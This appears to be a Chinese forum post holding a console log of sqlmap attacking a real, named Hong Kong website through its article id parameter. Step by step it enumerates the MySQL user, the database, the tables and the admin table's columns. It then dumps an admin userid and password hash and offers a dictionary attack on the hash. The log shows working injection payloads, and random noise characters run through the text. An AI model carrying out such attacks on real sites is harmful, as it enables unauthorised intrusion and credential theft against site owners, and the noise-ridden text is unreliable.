D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db+ J3 G9 B1 @: L
ms "Mysql" --current-user /* 注解:获取当前用户名称" k+ C- Q2 T0 @7 i. z
sqlmap/0.9 - automatic SQL injection and database takeover tool- w# y0 J1 O7 r! A
http://sqlmap.sourceforge.net starting at: 16:53:54
3 q9 \5 P7 r+ z* A6 S# u; F[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
! L: ]$ O; R" I p3 Q# x session file% g: K2 o: @8 O2 [( K9 R1 ^' O
[16:53:54] [INFO] resuming injection data from session file; f: m+ ~. C4 G! S5 c$ `
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file( M* d5 e3 s( k* D9 v9 P
[16:53:54] [INFO] testing connection to the target url
, d/ g$ d; ^) i, L) [- H( Xsqlmap identified the following injection points with a total of 0 HTTP(s) reque. T) x% f' l6 @5 v( _, H' }
sts:
: q- U, ]5 t! A5 O' ~. c5 l---4 f; U! \( O7 \" z
Place: GET# K7 L4 D' ~5 ]- N/ L/ j7 a7 t9 s
Parameter: id
0 N4 U& u5 P) m6 ?0 I Type: boolean-based blind9 {4 U, f9 X( y' s0 e1 L5 }
Title: AND boolean-based blind - WHERE or HAVING clause# d1 O) B9 @( ]" q2 r. E5 y0 n
Payload: id=276 AND 799=799$ y) j* z( _& d% P
Type: error-based
$ W& F+ A& ?7 Y" S0 m2 P Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
7 w1 Y" p( ]5 G Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,1 ]- S% z; l5 F2 H
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,584 j0 u2 V, h/ f
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
6 v0 y+ K$ z. o; c2 o. Y Type: UNION query
: m$ I$ @* J$ z! F4 B' P2 \ Title: MySQL UNION query (NULL) - 1 to 10 columns5 U0 \& k. {( v" g
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
( U5 `% y9 r2 `(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
" R3 m" U6 b! A2 a" {CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
: H8 [0 j6 `' r0 S% t9 {# `3 g" \, r Type: AND/OR time-based blind
' W" a, W- t$ j- O, l Title: MySQL > 5.0.11 AND time-based blind
% Y: N* M4 E5 D+ |3 o* _! X Payload: id=276 AND SLEEP(5)
: M/ g, U% g' g! }5 M! s0 W---6 T+ |! o+ @4 w4 d
[16:53:55] [INFO] the back-end DBMS is MySQL/ ^6 ?1 j# P" P% n
web server operating system: Windows4 K! q- H% y5 A' T
web application technology: Apache 2.2.11, PHP 5.3.0
5 F2 B% J8 j; C4 jback-end DBMS: MySQL 5.0
3 M$ \5 e8 Z( }% h) `[16:53:55] [INFO] fetching current user
: I" p0 n+ F* X1 Vcurrent user: 'root@localhost' - t; o' a) \) r9 Q: m1 Z( |
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
& x7 K" a7 b+ G8 }% Qtput\www.wepost.com.hk' shutting down at: 16:53:58- e+ D$ Z' B# v+ k) P: e7 M: }
8 M; K* g0 t3 f2 }% FD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db4 x3 j0 c1 W: z# E' y3 l
ms "Mysql" --current-db /*当前数据库
+ b# O3 B5 O* [ sqlmap/0.9 - automatic SQL injection and database takeover tool
1 S8 U3 R5 p } http://sqlmap.sourceforge.net starting at: 16:54:168 B' V0 J" t, E4 c; b" ]% ?
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
T) {: s3 O: m session file
: \* j% g9 M& Y1 Q[16:54:16] [INFO] resuming injection data from session file
8 ` M- K$ ]* H[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
! u1 E& r/ _$ E" ^[16:54:16] [INFO] testing connection to the target url; |8 H" H4 I- G6 o h9 g
sqlmap identified the following injection points with a total of 0 HTTP(s) reque8 Y$ M: ~ \! ^0 B5 v; v% q0 z0 U! p
sts:6 L M) Q! u8 r4 X a
---
/ |1 T4 P) A0 @+ L: _& CPlace: GET& m4 J/ B R# K. v0 E
Parameter: id
9 h% `0 h1 ?0 i) m/ h) O Type: boolean-based blind- D5 t) v3 Y0 i* o2 R
Title: AND boolean-based blind - WHERE or HAVING clause
- E; [& h0 a$ {! t Payload: id=276 AND 799=7992 p4 W$ M4 R5 x! m ^
Type: error-based, m7 M0 H9 w8 y2 ?, w# Y( u# u
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause! F( o4 e* o+ Q6 d
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
( i- z9 |, I: c+ R6 ?+ o1 _( V. T120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
' C8 e# P) F9 x# |* }8 @* f),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)) m! L* u9 D0 \" [. Y
Type: UNION query7 r+ T5 P1 ?$ T
Title: MySQL UNION query (NULL) - 1 to 10 columns
# g1 ~6 A0 Z% p+ Q2 Q9 a4 s- L5 q Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR3 L2 H' f( A$ Z4 ?0 H& \
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
/ e4 C/ M+ k9 u/ Y9 \4 `CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
8 I/ ^$ P/ X$ Z8 P Type: AND/OR time-based blind- l2 _5 T7 B0 s
Title: MySQL > 5.0.11 AND time-based blind
4 l3 V: }9 J4 j/ J Payload: id=276 AND SLEEP(5)! e. |% U3 _2 ^5 x$ x
---, x( {$ |4 \" h7 v U S# \! c' }
[16:54:17] [INFO] the back-end DBMS is MySQL
+ y& u3 o8 D- Lweb server operating system: Windows: d+ o3 j9 ^3 d* G5 S
web application technology: Apache 2.2.11, PHP 5.3.0
0 e9 Q/ n+ `" Y/ Lback-end DBMS: MySQL 5.0: [2 g2 X' I1 o |' d- |; ~
[16:54:17] [INFO] fetching current database
0 E1 ?# G" U& [current database: 'wepost'* t, D. e2 w0 J3 |8 n
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
9 y7 W L5 k! u8 h0 utput\www.wepost.com.hk' shutting down at: 16:54:18
" |/ a! \" t9 J' Z% [7 WD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
# S& O9 {* }3 _. Ums "Mysql" --tables -D "wepost" /*获取当前数据库的表名* A* b3 t8 W0 r, Z5 t
sqlmap/0.9 - automatic SQL injection and database takeover tool" ~$ l) @% R& l- C& {
http://sqlmap.sourceforge.net starting at: 16:55:25
9 b; L4 ^7 D3 b! A[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
( `& I3 s- ^0 [* N& T O( X: B0 S session file
% Q6 F) ]+ ~$ ] s5 O- @[16:55:25] [INFO] resuming injection data from session file
+ }2 W% U+ x+ I% M+ U/ I3 d[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file" q3 K1 K' Q! h5 M" Q( `- J( |
[16:55:25] [INFO] testing connection to the target url) [' C4 n9 Y& S6 p# ~7 s
sqlmap identified the following injection points with a total of 0 HTTP(s) reque: ~5 I/ N9 m6 v' H Z" b
sts:
$ c7 J m) {0 z. }9 K2 D---' i7 [9 _7 r$ I0 x. v/ x) n
Place: GET
1 U- D8 t, J. o/ g& S. oParameter: id
' ?5 U7 d. |0 x* G Type: boolean-based blind4 f \: O" W! o; S1 h
Title: AND boolean-based blind - WHERE or HAVING clause2 A1 f7 q+ t+ u8 l; f, ], B2 S* _
Payload: id=276 AND 799=799 X4 l; ?' ]& U) F+ H- [
Type: error-based4 o9 _+ r4 L1 x) j
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause; K0 C6 ^* z# ]. S- ^! n
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,3 V. h, ~) }, c. G) G. c
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
$ t4 W' \% K! w7 N3 Y, C) F0 b),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)/ u/ I- t( i8 e- {5 R, T4 J
Type: UNION query
s. e- U8 ~. c+ r Title: MySQL UNION query (NULL) - 1 to 10 columns
; C! o* W5 ?0 X; t* V1 t* j Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
9 c9 f7 h1 O3 h% c(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),- o. u9 Z+ H' k( l* n; ]: R" W
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#0 C, Q8 B6 {! T ^( Q# W
Type: AND/OR time-based blind
1 z" \, L2 O" L$ X8 P Title: MySQL > 5.0.11 AND time-based blind
" ]8 N6 P5 G# E+ y( {3 k3 w Payload: id=276 AND SLEEP(5)5 c' Q$ ?& Q- {1 c; t; a
---
6 z# S" h. }* j2 K$ J5 {/ C4 C8 {[16:55:26] [INFO] the back-end DBMS is MySQL
: t. u2 u! \3 N0 P3 m y6 vweb server operating system: Windows
" ^9 B! @/ x0 M% N, p/ g4 Aweb application technology: Apache 2.2.11, PHP 5.3.0' ?6 w& S* x- ~$ ~) t) E+ d0 ]
back-end DBMS: MySQL 5.0% M V; y% {& |/ }8 i' |
[16:55:26] [INFO] fetching tables for database 'wepost', x3 a3 \# m& P/ e
[16:55:27] [INFO] the SQL query used returns 6 entries. K5 n& X# B' y( ~3 q
Database: wepost
0 \2 h, I7 M2 p% V2 M, }[6 tables]" ^# g& {* Q: ^) Z
+-------------+
# F; ?3 O' r$ D+ d. t3 V| admin |
, y5 h" o6 i6 W0 \0 ^( ]: @: j| article |5 ^+ ~! Z! J# E: b% a k
| contributor |
: b h# {# f* U: \; u' M: f; k6 X| idea |
1 W+ G5 W7 W6 ~# l5 |/ ^* _| image |
3 n, t" M; o# S6 \/ Z7 W| issue |* \$ i! ~( R% i5 X- c
+-------------+/ e( k+ y! I7 Z3 H& p
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
; q x+ u" K [, Ktput\www.wepost.com.hk' shutting down at: 16:55:33' ^+ |: W# f% ]3 z& M4 j) v) D
, e# l% h& t) Y0 p F# B
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db$ [8 l, L3 @: ?- D0 u, t
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
! T9 u/ K5 H% G; h# K sqlmap/0.9 - automatic SQL injection and database takeover tool5 g: U0 u' W9 }3 o6 @
http://sqlmap.sourceforge.net starting at: 16:56:06
% u5 \9 s( J9 y8 k* C7 Esqlmap identified the following injection points with a total of 0 HTTP(s) reque
2 B% [6 y. T9 @" Msts:
6 E: K7 u0 B7 q' r O: r---+ n5 p) ?+ X( z R; y/ d
Place: GET% @7 m+ F3 C. t s
Parameter: id
* ~8 U3 l7 Q* ?$ ?1 T+ n- k Type: boolean-based blind
1 X) V4 h5 }3 s- `! I Title: AND boolean-based blind - WHERE or HAVING clause+ Y0 U7 U( ]) w
Payload: id=276 AND 799=799
% [, w+ o7 S9 d( n- z8 V* o Type: error-based
0 n4 G% ?7 R* A [ Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause, g1 }1 Z, A; ?, P3 Q
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
$ R0 l: k* h4 n/ ]8 j4 O120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
( C) e* z) Q% v% C+ i, F),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
3 ^/ l1 ?7 q: U" q& _8 w3 x Type: UNION query
. I! u, Z8 O/ q# Z Title: MySQL UNION query (NULL) - 1 to 10 columns
1 g! y5 V) t0 S) N( G3 m0 x Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
4 ^3 h0 J" L+ P$ X( m- E- b(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),6 h, n! x9 A& j( g
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#9 z2 T. G0 J, L3 ~5 l( Q+ @+ u
Type: AND/OR time-based blind" [% T; S) f7 c6 V7 I
Title: MySQL > 5.0.11 AND time-based blind
7 F: a/ z. f, F! F Payload: id=276 AND SLEEP(5)6 K8 O* Z2 [- h( i
---( [% \* E. d. [3 S
web server operating system: Windows8 R4 {( D) ]1 Z
web application technology: Apache 2.2.11, PHP 5.3.03 a$ t3 q! V1 n+ T! L! ?
back-end DBMS: MySQL 5.0% Y9 `- |+ [7 i0 q3 I0 r3 }: u, q
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
8 N. S' a# J6 Ossion': wepost, wepost
* |/ _6 ~8 I0 z" ~# O( n1 iDatabase: wepost
9 \) K2 d! [4 i0 U1 nTable: admin
6 E3 b) o. h! C- g% \/ Q[4 columns]
1 n# T) w& x1 `1 R( Q8 _- _. F+----------+-------------+
+ ]# L2 ?3 z' e. A+ D: X| Column | Type |5 P. {3 N( J4 U3 o' W
+----------+-------------+
+ I8 i; R& r% R% j| id | int(11) |
5 }( f1 n& ?% L; y| password | varchar(32) |! [) Q+ G$ Z0 U) q& ^
| type | varchar(10) |
# o' \: b' J* [9 j" O6 D$ q| userid | varchar(20) |% x8 Z# ?+ |5 I& B3 d9 ~9 o
+----------+-------------+
" ^5 ~+ X" z6 [7 o shutting down at: 16:56:19
0 S1 W4 s4 A! X% D! O7 \; ^8 h# G `) h
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
2 q1 I% j I5 cms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容8 {* b4 C. [2 v$ z
sqlmap/0.9 - automatic SQL injection and database takeover tool
+ M( n) F, `. W- z* E http://sqlmap.sourceforge.net starting at: 16:57:14
: E( W/ @5 C! E( A7 psqlmap identified the following injection points with a total of 0 HTTP(s) reque! E+ D# ]& P& G$ _! u3 k
sts:
+ F! m5 O. Y$ I2 l---; ~1 d; |; F$ p7 z3 w1 w7 V
Place: GET) D; F6 s$ j# s! X* c# G! c
Parameter: id! J! g/ @# }* f* d' A% l
Type: boolean-based blind
& @4 d8 Z% y! S! e0 H- ^! @4 s Title: AND boolean-based blind - WHERE or HAVING clause' r& Z# h- {/ ~2 y; Y
Payload: id=276 AND 799=799
* ^2 E# \* d5 Q) ~% F Type: error-based; V7 ?) r0 A" H' X/ Z6 H/ F( t
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
( `' ~. _" F" S6 q9 t/ z1 ], u Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,6 p) E: V& C& [+ P- v6 u8 L
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
% ]6 ~: C- ]( q( N3 i),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
) `1 d! B. i9 M% c* Z) A" { Type: UNION query i+ B1 M& f& I- N V B
Title: MySQL UNION query (NULL) - 1 to 10 columns
) i+ P: l* {. x3 ?/ V3 k$ j Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR q, C4 T/ t( F# q" D/ g
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
! A2 B* O) G2 k# \4 T& wCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#% W: t* Q9 \; j5 x2 ?1 y7 Y
Type: AND/OR time-based blind
- R1 e, i3 K. ?/ w* F/ ? Title: MySQL > 5.0.11 AND time-based blind
9 c: `/ o- M$ q- q1 g: C7 h Payload: id=276 AND SLEEP(5)
. x/ V; {) N( K! o/ l) z% c* v! h---
& V. r" t A/ V8 |web server operating system: Windows( o+ j& K' L! Z
web application technology: Apache 2.2.11, PHP 5.3.0# B! V/ G: m0 p7 t6 D3 T
back-end DBMS: MySQL 5.04 H, t/ J: ?- u* {2 x; q) H( W
recognized possible password hash values. do you want to use dictionary attack o
% w1 @: }( d/ b$ in retrieved table items? [Y/n/q] y0 s v3 `0 b3 H a- X9 Z
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]6 }! r- M# X; f7 B/ Z
do you want to use common password suffixes? (slow!) [y/N] y
6 U! ?: J( g% Q Q0 |9 Q" j2 kDatabase: wepost+ C9 L# n/ `$ E8 K
Table: admin
" }( F1 _) [) b1 p, K( r[1 entry]
$ m( q. D3 n+ j+----------------------------------+------------+) h% [; q$ W- r. y
| password | userid |& |. Q% c/ s& d8 f* ?
+----------------------------------+------------+$ u/ j! M5 |) l1 w7 o/ w
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
7 a" m8 B$ z( l; n0 c" ^/ D. m+----------------------------------+------------+
5 Q4 H# G% R' I5 H shutting down at: 16:58:14
! `$ K* ~/ {% M; V' C; v8 Y8 j
7 [" t+ N9 P- SD:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对